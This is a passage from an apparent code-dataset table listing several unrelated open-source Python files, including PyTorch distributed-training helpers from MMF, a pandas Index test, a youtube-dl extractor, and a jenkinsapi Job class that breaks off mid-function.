ext | sha | content |
---|---|---|
py | 1a343963fe9034a55928eff59c24558d349b8f84 | # Copyright (c) Facebook, Inc. and its affiliates.
# Inspired from maskrcnn_benchmark, fairseq
import logging
import os
import pickle
import socket
import subprocess
import warnings
import torch
from mmf.common.registry import registry
from torch import distributed as dist
try:
import torch_xla.core.xla_model as xm
except ImportError:
xm = None
MAX_SIZE_LIMIT = 65533
BYTE_SIZE = 256
logger = logging.getLogger(__name__)
# copied from https://github.com/facebookresearch/vissl/blob/master/vissl/utils/distributed_gradients.py
class GatherLayer(torch.autograd.Function):
"""
Gather tensors from all workers with support for backward propagation:
Unlike torch.distributed.all_gather, this implementation does not cut the gradients.
"""
@staticmethod
def forward(ctx, x):
output = [torch.zeros_like(x) for _ in range(dist.get_world_size())]
dist.all_gather(output, x)
return tuple(output)
@staticmethod
def backward(ctx, *grads):
all_gradients = torch.stack(grads)
dist.all_reduce(all_gradients)
return all_gradients[dist.get_rank()]
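# Usage sketch (illustrative, not part of the original module): with an
# initialized process group, gathering through GatherLayer keeps the autograd
# graph connected to the local tensor, so a loss computed over the gathered
# features still backpropagates, unlike a plain dist.all_gather.
def _example_gather_with_backward(features):
    gathered = GatherLayer.apply(features)  # tuple of world_size tensors
    return torch.cat(gathered, dim=0)  # differentiable w.r.t. `features`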
class XLAGatherLayer(torch.autograd.Function):
"""
Gather tensors from all TPU workers with support for backward propagation.
"""
@staticmethod
def forward(ctx, x, dim):
ctx.dim = dim
tensor_list = xm.all_gather(x.unsqueeze(dim), dim=dim)
return tensor_list
@staticmethod
def backward(ctx, grad_output):
dim = ctx.dim
all_grad_output = xm.all_reduce(xm.REDUCE_SUM, grad_output)
return all_grad_output.select(dim, xm.get_ordinal()), None
def synchronize(message="sync-workers"):
if is_xla():
xm.rendezvous(message)
elif not dist.is_available():
return
if not dist.is_nccl_available():
return
if not dist.is_initialized():
return
world_size = dist.get_world_size()
if world_size == 1:
return
dist.barrier()
def is_xla():
# Covers the None case as well
return bool(registry.get("is_xla", no_warning=True))
def get_rank():
if is_xla():
return xm.get_ordinal()
if not dist.is_available():
return 0
if not dist.is_nccl_available():
return 0
if not dist.is_initialized():
return 0
return dist.get_rank()
def is_master():
return get_rank() == 0
def is_dist_initialized():
return dist.is_available() and dist.is_initialized()
def get_world_size():
if is_xla():
return xm.xrt_world_size()
if not dist.is_available():
return 1
if not dist.is_nccl_available():
return 1
if not dist.is_initialized():
return 1
return dist.get_world_size()
def broadcast_tensor(tensor, src=0):
world_size = get_world_size()
if world_size < 2:
return tensor
with torch.no_grad():
if is_xla():
tensor = xm.all_to_all(
tensor.repeat([world_size, 1]),
split_dimension=0,
concat_dimension=0,
split_count=world_size,
)[0]
else:
dist.broadcast(tensor, src=src)
return tensor
def broadcast_scalar(scalar, src=0, device="cpu"):
if get_world_size() < 2:
return scalar
scalar_tensor = torch.tensor(scalar).long().to(device)
scalar_tensor = broadcast_tensor(scalar_tensor, src)
return scalar_tensor.item()
def reduce_tensor(tensor):
world_size = get_world_size()
if world_size < 2:
return tensor
with torch.no_grad():
dist.reduce(tensor, dst=0)
if dist.get_rank() == 0:
tensor = tensor.div(world_size)
return tensor
def gather_tensor(tensor):
world_size = get_world_size()
if world_size < 2:
return tensor
with torch.no_grad():
tensor_list = []
for _ in range(world_size):
tensor_list.append(torch.zeros_like(tensor))
if is_xla():
tensor_list = xm.all_gather(tensor)
tensor_list = tensor_list.view(world_size, *tensor.size())
else:
dist.all_gather(tensor_list, tensor)
tensor_list = torch.stack(tensor_list, dim=0)
return tensor_list
def gather_tensor_along_batch(tensor, dim=0):
world_size = get_world_size()
if world_size < 2:
return tensor
with torch.no_grad():
tensor_list = []
for _ in range(world_size):
tensor_list.append(torch.zeros_like(tensor))
dist.all_gather(tensor_list, tensor)
tensor_list = torch.cat(tensor_list, dim=dim)
return tensor_list
def gather_tensor_along_batch_with_backward(tensor, dim=0):
world_size = get_world_size()
if world_size < 2:
return tensor
if is_xla():
tensor_list = XLAGatherLayer.apply(tensor, dim)
tensor_list = tensor_list.flatten(start_dim=dim, end_dim=dim + 1)
else:
tensor_list = GatherLayer.apply(tensor)
tensor_list = torch.cat(tensor_list, dim=dim)
return tensor_list
def reduce_dict(dictionary):
world_size = get_world_size()
if world_size < 2:
return dictionary
with torch.no_grad():
if len(dictionary) == 0:
return dictionary
keys, values = zip(*sorted(dictionary.items()))
values = torch.stack(values, dim=0)
if is_xla():
values = xm.all_reduce("sum", [values], scale=1.0 / world_size)[0]
else:
dist.reduce(values, dst=0)
if dist.get_rank() == 0:
# only main process gets accumulated, so only divide by
# world_size in this case
values /= world_size
reduced_dict = {k: v for k, v in zip(keys, values)}
return reduced_dict
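# Illustrative usage (an assumption, not part of the original file): reduce a
# dict of scalar tensors across workers and log it only on the master process,
# since after dist.reduce only rank 0 holds the averaged values.
def _example_log_reduced_metrics(metrics):
    reduced = reduce_dict(metrics)
    if is_master():
        logger.info(f"averaged metrics: {reduced}")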
# Object byte tensor utilities have been adopted from
# https://github.com/pytorch/fairseq/blob/master/fairseq/distributed_utils.py
def object_to_byte_tensor(obj, max_size=4094):
"""
Encode Python objects to PyTorch byte tensors
"""
assert max_size <= MAX_SIZE_LIMIT
byte_tensor = torch.zeros(max_size, dtype=torch.uint8)
obj_enc = pickle.dumps(obj)
obj_size = len(obj_enc)
if obj_size > max_size:
raise Exception(
f"objects too large: object size {obj_size}, max size {max_size}"
)
byte_tensor[0] = obj_size // BYTE_SIZE
byte_tensor[1] = obj_size % BYTE_SIZE
byte_tensor[2 : 2 + obj_size] = torch.ByteTensor(list(obj_enc))
return byte_tensor
def byte_tensor_to_object(byte_tensor, max_size=MAX_SIZE_LIMIT):
"""
Decode PyTorch byte tensors to Python objects
"""
assert max_size <= MAX_SIZE_LIMIT
obj_size = byte_tensor[0].item() * BYTE_SIZE + byte_tensor[1].item()
obj_enc = bytes(byte_tensor[2 : 2 + obj_size].tolist())
obj = pickle.loads(obj_enc)
return obj
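# Round-trip sketch (illustrative, not part of the original module): any small
# picklable object can be packed into a fixed-size uint8 tensor, broadcast with
# broadcast_tensor, and unpacked on the receiving side.
def _example_broadcast_object(obj, device="cpu"):
    byte_tensor = object_to_byte_tensor(obj).to(device)
    byte_tensor = broadcast_tensor(byte_tensor, src=0)
    return byte_tensor_to_object(byte_tensor)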
def infer_init_method(config):
if config.distributed.init_method is not None:
return
registry.register("is_xla", config.training.get("device", "cuda") == "xla")
# support torch.distributed.launch
if all(
key in os.environ
for key in ["MASTER_ADDR", "MASTER_PORT", "WORLD_SIZE", "RANK"]
):
config.distributed.init_method = "env://"
config.distributed.world_size = int(os.environ["WORLD_SIZE"])
config.distributed.rank = int(os.environ["RANK"])
config.distributed.no_spawn = True
# we can determine the init method automatically for Slurm
elif config.distributed.port > 0:
node_list = os.environ.get("SLURM_STEP_NODELIST")
if node_list is None:
node_list = os.environ.get("SLURM_JOB_NODELIST")
if node_list is not None:
try:
hostnames = subprocess.check_output(
["scontrol", "show", "hostnames", node_list]
)
config.distributed.init_method = "tcp://{host}:{port}".format(
host=hostnames.split()[0].decode("utf-8"),
port=config.distributed.port,
)
nnodes = int(os.environ.get("SLURM_NNODES"))
ntasks_per_node = os.environ.get("SLURM_NTASKS_PER_NODE")
if ntasks_per_node is not None:
ntasks_per_node = int(ntasks_per_node)
else:
ntasks = int(os.environ.get("SLURM_NTASKS"))
nnodes = int(os.environ.get("SLURM_NNODES"))
assert ntasks % nnodes == 0
ntasks_per_node = int(ntasks / nnodes)
if ntasks_per_node == 1:
assert config.distributed.world_size % nnodes == 0
gpus_per_node = config.distributed.world_size // nnodes
node_id = int(os.environ.get("SLURM_NODEID"))
config.distributed.rank = node_id * gpus_per_node
else:
assert ntasks_per_node == config.distributed.world_size // nnodes
config.distributed.no_spawn = True
config.distributed.rank = int(os.environ.get("SLURM_PROCID"))
config.device_id = int(os.environ.get("SLURM_LOCALID"))
except subprocess.CalledProcessError as e: # scontrol failed
raise e
except FileNotFoundError: # Slurm is not installed
pass
def distributed_init(config):
if config.distributed.world_size == 1:
raise ValueError("Cannot initialize distributed with distributed_world_size=1")
logger.info(f"XLA Mode:{is_xla()}")
if is_xla():
config.device_id = xm.get_local_ordinal()
config.distributed.rank = xm.get_ordinal()
elif dist.is_initialized():
warnings.warn("Distributed is already initialized, cannot initialize twice!")
config.distributed.rank = dist.get_rank()
else:
logger.info(
f"Distributed Init (Rank {config.distributed.rank}): "
f"{config.distributed.init_method}"
)
dist.init_process_group(
backend=config.distributed.backend,
init_method=config.distributed.init_method,
world_size=config.distributed.world_size,
rank=config.distributed.rank,
)
logger.info(
f"Initialized Host {socket.gethostname()} as Rank "
f"{config.distributed.rank}"
)
if "MASTER_ADDR" not in os.environ or "MASTER_PORT" not in os.environ:
# Set for onboxdataloader support
split = config.distributed.init_method.split("//")
assert len(split) == 2, (
"host url for distributed should be split by '//' "
+ "into exactly two elements"
)
split = split[1].split(":")
assert (
len(split) == 2
), "host url should be of the form <host_url>:<host_port>"
os.environ["MASTER_ADDR"] = split[0]
os.environ["MASTER_PORT"] = split[1]
# perform a dummy all-reduce to initialize the NCCL communicator
dist.all_reduce(torch.zeros(1).cuda())
suppress_output(is_master())
config.distributed.rank = dist.get_rank()
return config.distributed.rank
def suppress_output(is_master):
"""Suppress printing on the current device. Force printing with `force=True`."""
import builtins as __builtin__
builtin_print = __builtin__.print
def print(*args, **kwargs):
force = kwargs.pop("force", False)
if is_master or force:
builtin_print(*args, **kwargs)
__builtin__.print = print
import warnings
builtin_warn = warnings.warn
def warn(*args, **kwargs):
force = kwargs.pop("force", False)
if is_master or force:
builtin_warn(*args, **kwargs)
# Log warnings only once
warnings.warn = warn
warnings.simplefilter("once", UserWarning)
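# Usage sketch (illustrative): once suppress_output(is_master()) has been
# installed, ordinary prints are silenced on non-master ranks, but a message
# can still be forced through on every rank:
#   print("visible only on rank 0")
#   print(f"rank {get_rank()} finished epoch", force=True)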
|
py | 1a343a5b589b165da79af523abb640047da78538 | """
Tests for ndarray-like method on the base Index class
"""
import pytest
import pandas as pd
from pandas import Index
import pandas._testing as tm
class TestReshape:
def test_repeat(self):
repeats = 2
index = pd.Index([1, 2, 3])
expected = pd.Index([1, 1, 2, 2, 3, 3])
result = index.repeat(repeats)
tm.assert_index_equal(result, expected)
def test_insert(self):
# GH 7256
# validate neg/pos inserts
result = Index(["b", "c", "d"])
# test 0th element
tm.assert_index_equal(Index(["a", "b", "c", "d"]), result.insert(0, "a"))
# test Nth element that follows Python list behavior
tm.assert_index_equal(Index(["b", "c", "e", "d"]), result.insert(-1, "e"))
# test loc +/- neq (0, -1)
tm.assert_index_equal(result.insert(1, "z"), result.insert(-2, "z"))
# test empty
null_index = Index([])
tm.assert_index_equal(Index(["a"]), null_index.insert(0, "a"))
@pytest.mark.parametrize(
"pos,expected",
[
(0, Index(["b", "c", "d"], name="index")),
(-1, Index(["a", "b", "c"], name="index")),
],
)
def test_delete(self, pos, expected):
index = Index(["a", "b", "c", "d"], name="index")
result = index.delete(pos)
tm.assert_index_equal(result, expected)
assert result.name == expected.name
def test_append_multiple(self):
index = Index(["a", "b", "c", "d", "e", "f"])
foos = [index[:2], index[2:4], index[4:]]
result = foos[0].append(foos[1:])
tm.assert_index_equal(result, index)
# empty
result = index.append([])
tm.assert_index_equal(result, index)
|
py | 1a343bc3baa09a251c059c56784341a4035dc5f4 | from datetime import datetime
from os import listdir
import pandas
from application_logging.logger import App_Logger
class dataTransformPredict:
def __init__(self):
self.goodDataPath = "Prediction_Raw_Files_Validated/Good_Raw"
self.logger = App_Logger()
def replaceMissingWithNull(self):
try:
log_file = open("Prediction_Logs/dataTransformLog.txt", 'a+')
onlyfiles = [f for f in listdir(self.goodDataPath)]
for file in onlyfiles:
data = pandas.read_csv(self.goodDataPath + "/" + file)
# list of columns with string datatype variables
columns = ["policy_bind_date","policy_state","policy_csl","insured_sex","insured_education_level","insured_occupation","insured_hobbies","insured_relationship","incident_state","incident_date","incident_type","collision_type","incident_severity","authorities_contacted","incident_city","incident_location","property_damage","police_report_available","auto_make","auto_model"]
for col in columns:
data[col] = data[col].apply(lambda x: "'" + str(x) + "'")
# #csv.update("'"+ csv['Wafer'] +"'")
# csv.update(csv['Wafer'].astype(str))
#csv['Wafer'] = csv['Wafer'].str[6:]
data.to_csv(self.goodDataPath+ "/" + file, index=None, header=True)
self.logger.log(log_file," %s: File Transformed successfully!!" % file)
#log_file.write("Current Date :: %s" %date +"\t" + "Current time:: %s" % current_time + "\t \t" + + "\n")
except Exception as e:
self.logger.log(log_file, "Data Transformation failed because:: %s" % e)
#log_file.write("Current Date :: %s" %date +"\t" +"Current time:: %s" % current_time + "\t \t" + "Data Transformation failed because:: %s" % e + "\n")
log_file.close()
raise e
log_file.close()
|
py | 1a343c34350f4c36bed2b3b475a503790c350013 | from __future__ import unicode_literals
from .common import InfoExtractor
class DefenseGouvFrIE(InfoExtractor):
IE_NAME = "defense.gouv.fr"
_VALID_URL = r"https?://.*?\.defense\.gouv\.fr/layout/set/ligthboxvideo/base-de-medias/webtv/(?P<id>[^/?#]*)"
_TEST = {
"url": "http://www.defense.gouv.fr/layout/set/ligthboxvideo/base-de-medias/webtv/attaque-chimique-syrienne-du-21-aout-2013-1",
"md5": "75bba6124da7e63d2d60b5244ec9430c",
"info_dict": {
"id": "11213",
"ext": "mp4",
"title": "attaque-chimique-syrienne-du-21-aout-2013-1",
},
}
def _real_extract(self, url):
title = self._match_id(url)
webpage = self._download_webpage(url, title)
video_id = self._search_regex(r"flashvars.pvg_id=\"(\d+)\";", webpage, "ID")
json_url = (
"http://static.videos.gouv.fr/brightcovehub/export/json/%s" % video_id
)
info = self._download_json(json_url, title, "Downloading JSON config")
video_url = info["renditions"][0]["url"]
return {
"id": video_id,
"ext": "mp4",
"url": video_url,
"title": title,
}
|
py | 1a343d63d399f02e67c2da6969d5fcfa5c39c386 | import sys
def get_default_python_version():
return "{major}.{minor}.0".format(
major=sys.version_info.major,
minor=sys.version_info.minor
)
|
py | 1a343d8f2eea5a1329f3ffa66946640cb015fe6c | # ----------------------------------------------------------------------------
# Copyright (c) 2016-2017, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
from ._alpha import (alpha, alpha_phylogenetic, alpha_group_significance,
alpha_correlation)
from ._beta import (beta, beta_phylogenetic, bioenv, beta_group_significance,
beta_correlation)
from ._ordination import pcoa
from ._core_metrics import core_metrics
from ._filter import filter_distance_matrix
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
__all__ = ['beta', 'beta_phylogenetic', 'alpha', 'alpha_phylogenetic', 'pcoa',
'alpha_group_significance', 'bioenv', 'beta_group_significance',
'alpha_correlation', 'core_metrics', 'filter_distance_matrix',
'beta_correlation']
|
py | 1a343f441b615c002c32994f8ebfee165c076054 | """
Module for jenkinsapi Job
"""
import json
import logging
import xml.etree.ElementTree as ET
import six.moves.urllib.parse as urlparse
from collections import defaultdict
from jenkinsapi.build import Build
from jenkinsapi.custom_exceptions import (
NoBuildData,
NotConfiguredSCM,
NotFound,
NotInQueue,
NotSupportSCM,
UnknownQueueItem,
BadParams,
)
from jenkinsapi.jenkinsbase import JenkinsBase
from jenkinsapi.mutable_jenkins_thing import MutableJenkinsThing
from jenkinsapi.queue import QueueItem
from jenkinsapi_utils.compat import to_string
SVN_URL = './scm/locations/hudson.scm.SubversionSCM_-ModuleLocation/remote'
GIT_URL = './scm/userRemoteConfigs/hudson.plugins.git.UserRemoteConfig/url'
HG_URL = './scm/source'
GIT_BRANCH = './scm/branches/hudson.plugins.git.BranchSpec/name'
HG_BRANCH = './scm/branch'
DEFAULT_HG_BRANCH_NAME = 'default'
log = logging.getLogger(__name__)
class Job(JenkinsBase, MutableJenkinsThing):
"""
Represents a jenkins job
A job can hold N builds which are the actual execution environments
"""
def __init__(self, url, name, jenkins_obj):
self.name = name
self.jenkins = jenkins_obj
self._revmap = None
self._config = None
self._element_tree = None
self._scm_prefix = ""
self._scm_map = {
'hudson.scm.SubversionSCM': 'svn',
'hudson.plugins.git.GitSCM': 'git',
'hudson.plugins.mercurial.MercurialSCM': 'hg',
'hudson.scm.NullSCM': 'NullSCM'
}
self._scmurlmap = {
'svn': lambda element_tree: list(element_tree.findall(SVN_URL)),
'git': lambda element_tree: list(element_tree.findall(self._scm_prefix + GIT_URL)),
'hg': lambda element_tree: list(element_tree.findall(HG_URL)),
None: lambda element_tree: []
}
self._scmbranchmap = {
'svn': lambda element_tree: [],
'git': lambda element_tree: list(element_tree.findall(self._scm_prefix + GIT_BRANCH)),
'hg': self._get_hg_branch,
None: lambda element_tree: []
}
self.url = url
JenkinsBase.__init__(self, self.url)
def __str__(self):
return self.name
def get_description(self):
return self._data["description"]
def get_jenkins_obj(self):
return self.jenkins
# When the hg branch used in the job is the default branch (i.e.
# "default"), the Mercurial plugin doesn't store the branch name in the
# job's config XML file. Create an XML node corresponding to the
# default branch.
def _get_hg_branch(self, element_tree):
branches = element_tree.findall(HG_BRANCH)
if not branches:
hg_default_branch = ET.Element('branch')
hg_default_branch.text = DEFAULT_HG_BRANCH_NAME
branches.append(hg_default_branch)
return branches
def poll(self, tree=None):
data = super(Job, self).poll(tree=tree)
if not tree and not self.jenkins.lazy:
self._data = self._add_missing_builds(self._data)
return data
# pylint: disable=E1123
# Unexpected keyword arg 'params'
def _add_missing_builds(self, data):
"""
Query Jenkins to get all builds of the job in the data object.
Jenkins API loads the first 100 builds and thus may not contain
all builds information. This method checks if all builds are loaded
in the data object and updates it with the missing builds if needed.
"""
if not data.get("builds"):
return data
# do not call _buildid_for_type here: it would poll and do an infinite
# loop
oldest_loaded_build_number = data["builds"][-1]["number"]
if 'firstBuild' not in self._data or not self._data['firstBuild']:
first_build_number = oldest_loaded_build_number
else:
first_build_number = self._data["firstBuild"]["number"]
all_builds_loaded = (oldest_loaded_build_number == first_build_number)
if all_builds_loaded:
return data
response = self.poll(tree='allBuilds[number,url]')
data['builds'] = response['allBuilds']
return data
def _get_config_element_tree(self):
"""
The ElementTree objects creation is unnecessary, it can be
a singleton per job
"""
if self._config is None:
self.load_config()
if self._element_tree is None:
self._element_tree = ET.fromstring(self._config)
return self._element_tree
def get_build_triggerurl(self):
if not self.has_params():
return "%s/build" % self.baseurl
return "%s/buildWithParameters" % self.baseurl
@staticmethod
def _mk_json_from_build_parameters(build_params, file_params=None):
"""
Build parameters must be submitted in a particular format
Key-Value pairs would be far too simple, no no!
Watch and read on and behold!
"""
if not isinstance(build_params, dict):
raise ValueError('Build parameters must be a dict')
build_p = [{'name': k, 'value': to_string(v)}
for k, v in sorted(build_params.items())]
out = {'parameter': build_p}
if file_params:
file_p = [{'name': k, 'file': k}
for k in file_params.keys()]
out['parameter'].extend(file_p)
if len(out['parameter']) == 1:
out['parameter'] = out['parameter'][0]
return out
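# Illustrative example (hypothetical parameter names), following the code
# above: two parameters produce
#   {'parameter': [{'name': 'BRANCH', 'value': 'main'},
#                  {'name': 'TARGET', 'value': 'arm'}]}
# while a single parameter collapses the list into a bare dict, which is the
# quirk the docstring above alludes to.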
@staticmethod
def mk_json_from_build_parameters(build_params, file_params=None):
json_structure = Job._mk_json_from_build_parameters(
build_params,
file_params
)
json_structure['statusCode'] = "303"
json_structure['redirectTo'] = "."
return json.dumps(json_structure)
def invoke(self, securitytoken=None, block=False,
build_params=None, cause=None, files=None, delay=5):
assert isinstance(block, bool)
if build_params and (not self.has_params()):
raise BadParams("This job does not support parameters")
params = {} # Via Get string
if securitytoken:
params['token'] = securitytoken
# Either copy the params dict or make a new one.
build_params = dict(build_params.items()) \
if build_params else {} # Via POSTed JSON
url = self.get_build_triggerurl()
if cause:
build_params['cause'] = cause
# Build require params as form fields
# and as Json.
data = {
'json': self.mk_json_from_build_parameters(
build_params,
files)
}
data.update(build_params)
response = self.jenkins.requester.post_and_confirm_status(
url,
data=data,
params=params,
files=files,
valid=[200, 201, 303],
allow_redirects=False
)
redirect_url = response.headers['location']
#
# Enterprise Jenkins implementations such as CloudBees locate their
# queue REST API base https://server.domain.com/jenkins/queue/api/
# above the team-specific REST API base
# https://server.domain.com/jenkins/job/my_team/api/
#
queue_baseurl_candidates = [self.jenkins.baseurl]
scheme, netloc, path, _, query, frag = \
urlparse.urlparse(self.jenkins.baseurl)
while path:
path = '/'.join(path.rstrip('/').split('/')[:-1])
queue_baseurl_candidates.append(
urlparse.urlunsplit([scheme, netloc, path, query, frag]))
redirect_url_valid = False
for queue_baseurl_candidate in queue_baseurl_candidates:
redirect_url_valid = redirect_url.startswith(
"%s/queue/item" % queue_baseurl_candidate)
if redirect_url_valid:
break
if not redirect_url_valid:
raise ValueError("Not a Queue URL: %s" % redirect_url)
qi = QueueItem(redirect_url, self.jenkins)
if block:
qi.block_until_complete(delay=delay)
return qi
def _buildid_for_type(self, buildtype):
"""
Gets a buildid for a given type of build
"""
KNOWNBUILDTYPES = [
"lastStableBuild",
"lastSuccessfulBuild",
"lastBuild",
"lastCompletedBuild",
"firstBuild",
"lastFailedBuild"]
assert buildtype in KNOWNBUILDTYPES, ('Unknown build info type: %s'
% buildtype)
data = self.poll(tree='%s[number]' % buildtype)
if not data.get(buildtype):
raise NoBuildData(buildtype)
return data[buildtype]["number"]
def get_first_buildnumber(self):
"""
Get the numerical ID of the first build.
"""
return self._buildid_for_type("firstBuild")
def get_last_stable_buildnumber(self):
"""
Get the numerical ID of the last stable build.
"""
return self._buildid_for_type("lastStableBuild")
def get_last_good_buildnumber(self):
"""
Get the numerical ID of the last good build.
"""
return self._buildid_for_type("lastSuccessfulBuild")
def get_last_failed_buildnumber(self):
"""
Get the numerical ID of the last failed build.
"""
return self._buildid_for_type(buildtype="lastFailedBuild")
def get_last_buildnumber(self):
"""
Get the numerical ID of the last build.
"""
return self._buildid_for_type("lastBuild")
def get_last_completed_buildnumber(self):
"""
Get the numerical ID of the last complete build.
"""
return self._buildid_for_type("lastCompletedBuild")
def get_build_dict(self):
builds = self.poll(tree='builds[number,url]')
if not builds:
raise NoBuildData(repr(self))
builds = self._add_missing_builds(builds)
builds = builds['builds']
last_build = self.poll(tree='lastBuild[number,url]')['lastBuild']
if builds and last_build and \
builds[0]['number'] != last_build['number']:
builds = [last_build] + builds
# FIXME SO how is this supposed to work if build is false-y?
# I don't think that builds *can* be false here, so I don't
# understand the test above.
return dict((build["number"], build["url"]) for build in builds)
def get_build_by_params(self, build_params, order=1):
first_build_number = self.get_first_buildnumber()
last_build_number = self.get_last_buildnumber()
if order != 1 and order != -1:
raise ValueError(
'Direction should be ascending or descending (1/-1)')
for number in range(first_build_number,
last_build_number + 1)[::order]:
build = self.get_build(number)
if build.get_params() == build_params:
return build
raise NoBuildData(
'No build with such params {params}'.format(params=build_params))
def get_revision_dict(self):
"""
Get dictionary of all revisions with a list of buildnumbers (int)
that used that particular revision
"""
revs = defaultdict(list)
if 'builds' not in self._data:
raise NoBuildData(repr(self))
for buildnumber in self.get_build_ids():
revs[self.get_build(buildnumber)
.get_revision()].append(buildnumber)
return revs
def get_build_ids(self):
"""
Return a sorted list of all good builds as ints.
"""
return reversed(sorted(self.get_build_dict().keys()))
def get_next_build_number(self):
"""
Return the next build number that Jenkins will assign.
"""
return self._data.get('nextBuildNumber', 0)
def get_last_stable_build(self):
"""
Get the last stable build
"""
bn = self.get_last_stable_buildnumber()
return self.get_build(bn)
def get_last_good_build(self):
"""
Get the last good build
"""
bn = self.get_last_good_buildnumber()
return self.get_build(bn)
def get_last_build(self):
"""
Get the last build
"""
bn = self.get_last_buildnumber()
return self.get_build(bn)
def get_first_build(self):
bn = self.get_first_buildnumber()
return self.get_build(bn)
def get_last_build_or_none(self):
"""
Get the last build or None if there is no builds
"""
try:
return self.get_last_build()
except NoBuildData:
return None
def get_last_completed_build(self):
"""
Get the last build regardless of status
"""
bn = self.get_last_completed_buildnumber()
return self.get_build(bn)
def get_buildnumber_for_revision(self, revision, refresh=False):
"""
:param revision: subversion revision to look for, int
:param refresh: boolean, whether or not to refresh the
revision -> buildnumber map
:return: list of buildnumbers, [int]
"""
if self.get_scm_type() == 'svn' and not isinstance(revision, int):
revision = int(revision)
if self._revmap is None or refresh:
self._revmap = self.get_revision_dict()
try:
return self._revmap[revision]
except KeyError:
raise NotFound("Couldn't find a build with that revision")
def get_build(self, buildnumber):
assert isinstance(buildnumber, int)
try:
url = self.get_build_dict()[buildnumber]
return Build(url, buildnumber, job=self)
except KeyError:
raise NotFound('Build #%s not found' % buildnumber)
def delete_build(self, build_number):
"""
Remove build
:param int build_number: Build number
:raises NotFound: When build is not found
"""
try:
url = self.get_build_dict()[build_number]
url = "%s/doDelete" % url
self.jenkins.requester.post_and_confirm_status(url, data='')
self.jenkins.poll()
except KeyError:
raise NotFound('Build #%s not found' % build_number)
def get_build_metadata(self, buildnumber):
"""
Get the build metadata for a given build number. For large builds with
tons of tests, this method is faster than get_build by returning less
data.
"""
if not isinstance(buildnumber, int):
raise ValueError('Parameter "buildNumber" must be int')
try:
url = self.get_build_dict()[buildnumber]
return Build(url, buildnumber, job=self, depth=0)
except KeyError:
raise NotFound('Build #%s not found' % buildnumber)
def __delitem__(self, build_number):
self.delete_build(build_number)
def __getitem__(self, buildnumber):
return self.get_build(buildnumber)
def __len__(self):
return len(self.get_build_dict())
def is_queued_or_running(self):
return self.is_queued() or self.is_running()
def is_queued(self):
data = self.poll(tree='inQueue')
return data.get('inQueue', False)
def get_queue_item(self):
"""
Return a QueueItem if this object is in a queue, otherwise raise
an exception
"""
if not self.is_queued():
raise UnknownQueueItem()
q_item = self.poll(tree='queueItem[url]')
qi_url = urlparse.urljoin(
self.jenkins.baseurl, q_item['queueItem']['url']
)
return QueueItem(qi_url, self.jenkins)
def is_running(self):
# self.poll()
try:
build = self.get_last_build_or_none()
if build is not None:
return build.is_running()
except NoBuildData:
log.info(
"No build info available for %s, assuming not running.",
str(self))
return False
def get_config(self):
"""
Returns the config.xml from the job
"""
response = self.jenkins.requester.get_and_confirm_status(
"%(baseurl)s/config.xml" % self.__dict__)
return response.text
def load_config(self):
self._config = self.get_config()
def get_scm_type(self):
element_tree = self._get_config_element_tree()
scm_element = element_tree.find('scm')
if not scm_element:
multibranch_scm_prefix = \
"properties/org.jenkinsci.plugins.workflow.multibranch.BranchJobProperty/branch/"
multibranch_path = multibranch_scm_prefix + "scm"
scm_element = element_tree.find(multibranch_path)
if scm_element:
# multibranch pipeline.
self._scm_prefix = multibranch_scm_prefix
scm_class = scm_element.get('class') if scm_element else None
scm = self._scm_map.get(scm_class)
if not scm:
raise NotSupportSCM(
'SCM class "%s" not supported by API for job "%s"'
% (scm_class, self.name))
if scm == 'NullSCM':
raise NotConfiguredSCM(
'SCM is not configured for job "%s"' % self.name)
return scm
def get_scm_url(self):
"""
Get list of project SCM URLs
For some SCMs Jenkins allows configuring and using several SCM URLs
:return: list of SCM URLs
"""
element_tree = self._get_config_element_tree()
scm = self.get_scm_type()
scm_url_list = [scm_url.text for scm_url in self._scmurlmap[
scm](element_tree)]
return scm_url_list
def get_scm_branch(self):
"""
Get list of SCM branches
:return: list of SCM branches
"""
element_tree = self._get_config_element_tree()
scm = self.get_scm_type()
return [scm_branch.text
for scm_branch in self._scmbranchmap[scm](element_tree)]
def modify_scm_branch(self, new_branch, old_branch=None):
"""
Modify SCM ("Source Code Management") branch name for configured job.
:param new_branch: new repository branch name to set.
    If the job has multiple branches configured and "old_branch" is
    not provided, the method will always modify the first branch.
:param old_branch: (optional) exact value of the branch name
    to be replaced.
    Some SCMs let Jenkins configure multiple branches per job; this
    parameter indicates which branch needs to be modified.
"""
element_tree = self._get_config_element_tree()
scm = self.get_scm_type()
scm_branch_list = self._scmbranchmap[scm](element_tree)
if scm_branch_list and not old_branch:
scm_branch_list[0].text = new_branch
self.update_config(ET.tostring(element_tree))
else:
for scm_branch in scm_branch_list:
if scm_branch.text == old_branch:
scm_branch.text = new_branch
self.update_config(ET.tostring(element_tree))
def modify_scm_url(self, new_source_url, old_source_url=None):
"""
Modify SCM ("Source Code Management") URL for configured job.
:param new_source_url: new repository URL to set.
    If the job has multiple repositories configured and
    "old_source_url" is not provided, the method will always modify
    the first URL.
:param old_source_url: (optional) some SCMs let Jenkins configure
    multiple repositories per job; this parameter indicates which
    repository needs to be modified.
"""
element_tree = self._get_config_element_tree()
scm = self.get_scm_type()
scm_url_list = self._scmurlmap[scm](element_tree)
if scm_url_list and not old_source_url:
scm_url_list[0].text = new_source_url
self.update_config(ET.tostring(element_tree))
else:
for scm_url in scm_url_list:
if scm_url.text == old_source_url:
scm_url.text = new_source_url
self.update_config(ET.tostring(element_tree))
def get_config_xml_url(self):
return '%s/config.xml' % self.baseurl
def update_config(self, config, full_response=False):
"""
Update the config.xml to the job
Also refresh the ElementTree object since the config has changed
:param full_response (optional): if True, it will return the full
response object instead of just the response text.
Useful for debugging and validation workflows.
"""
url = self.get_config_xml_url()
config = str(config) # cast unicode in case of Python 2
response = self.jenkins.requester.post_url(url, params={}, data=config)
self._element_tree = ET.fromstring(config)
if full_response:
return response
return response.text
def get_downstream_jobs(self):
"""
Get all the possible downstream jobs
:return List of Job
"""
downstream_jobs = []
try:
for j in self._data['downstreamProjects']:
downstream_jobs.append(
self.get_jenkins_obj()[j['name']])
except KeyError:
return []
return downstream_jobs
def get_downstream_job_names(self):
"""
Get all the possible downstream job names
:return List of String
"""
downstream_jobs = []
try:
for j in self._data['downstreamProjects']:
downstream_jobs.append(j['name'])
except KeyError:
return []
return downstream_jobs
def get_upstream_job_names(self):
"""
Get all the possible upstream job names
:return List of String
"""
upstream_jobs = []
try:
for j in self._data['upstreamProjects']:
upstream_jobs.append(j['name'])
except KeyError:
